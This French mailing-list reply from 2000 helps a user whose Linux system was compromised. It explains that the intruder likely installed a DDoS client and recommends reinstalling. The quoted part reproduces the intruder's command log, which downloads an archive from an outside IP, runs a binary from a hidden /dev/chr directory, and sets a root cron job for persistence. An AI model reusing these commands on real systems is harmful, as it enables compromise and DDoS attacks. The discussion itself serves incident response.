[Précédent (date)] [Suivant (date)] [Précédent (sujet)] [Suivant (sujet)] [Index par date] [Index par sujet]
Re: Hacking, en suis-je victime??
- To: Daniel Chenard <>
- Subject: Re: Hacking, en suis-je victime??
- From: Benoit Caron <>
- Date: Fri, 6 Oct 2000 11:17:06 -0400 (EDT)
-
In-reply-to: <[email protected]>
>
> Hep, je sais que mon système n'est pas inviolable mais bon...
> Je sais aussi que si quelqu'un me hack que je dois mieux me protéger...
> ce que je comprends pas, comment a-t-il fait pour installer un prog sous
> mon username???
>
Il t'as fait exécuter une commande a ton insu. La façon classique de
faire ca est de te créer un fichier du genre .profile dans ton home, qui
va s'exécuter a ton login...
> le point 2
> Je dois dire que oui il y a une fièreté personnel de rentrer sur un
> ordi, on peut y glisser un mot, un fichier et dire: "Coucou!!!
> Vérifie la sécurité de ton système, il y a des trous!!!" Soit, si
> seulement ce serait que cette en garde mais ce n'est pas le cas!!
> il l'a installer et foutu un cron sur celui ci
>
Les hackers poli et gentil ne sont pas légion... ;o) Surtout dans les
script kiddies, ce qui est probablement le cas pour toi...
> Ce qui m'inquiète, c'est que ce prog contient des ".h" telque icmp.h,
> ip.h bref je sais pas a quoi ca rime mais j'aimerais savoir!!!
>
> S'il y a un gars fort en programation socket et qui peut me dire a quoi
> ca rime je vous en remerci!!
Je ne peux pas dire que je suis fort en programmation socket, mais je
devine qu'il t'as installé un client quelconque qui va servir a faire
des ping (le protocole icmp) dans ce qui deviendra un DDOS : Distributed
Denial of Service.
> Et oui je sais qui a fait le coup, j'ai son adresse ip et son
> username... il semble avoir une
> connection permanente..
>
Techniquement, ca pourrait relevé de la GRC. Mais je suis pas certain
qu'ils ont le temps de regarde un cas dans ton genre... :o\
> ------------------
> mkdir /dev/chr ;cd /dev/chr ;ncftpget -u username_du_gars -p password_du_gars son_adresse_ip . a.tar.gz ;tar zxvf a.tar.gz ;rm -rf *.gz ;cd client ;./td
> ps aux
> echo "0,10,20,30,40,50 * * * * /dev/chr/client/td >/dev/null 2>&1" >> cron ;crontab -u root /dev/chr/client/cron
> ps aux
> -------------
>
> J'aimerais vous fournir le a.tar.gz ainsi que le newstachel.tar.gz
> mais je ne peux pas avec ce truc via le web ..:-(
Ca pourrait etre intéressant.... Mais pour moi, ce n'est pas nécessaire
: ton comique a probablement modifié ca et la des applications dans ton
système.. :o\ J'imagine que tu pourrais vérifier l'intégrité de tes
fichiers avec rpm (ou ap-get? je ne connais pas debian...), mais la
facon simple et sure serait de faire une sauvegarde de tes données et de
réinstaller... En faisant attention de boucher le trou par où il est
rentré... :o)
--
Benoit Caron
Analyste-Programmeur
Netgraphe - Webfin.com - Le Web Financier
[email protected]
- - - - - - - - - - - - - - - - - - - - - - - -
"Because mod_perl is, frankly, scarier
than a typical Apache module."
- John Udell, Byte March 1998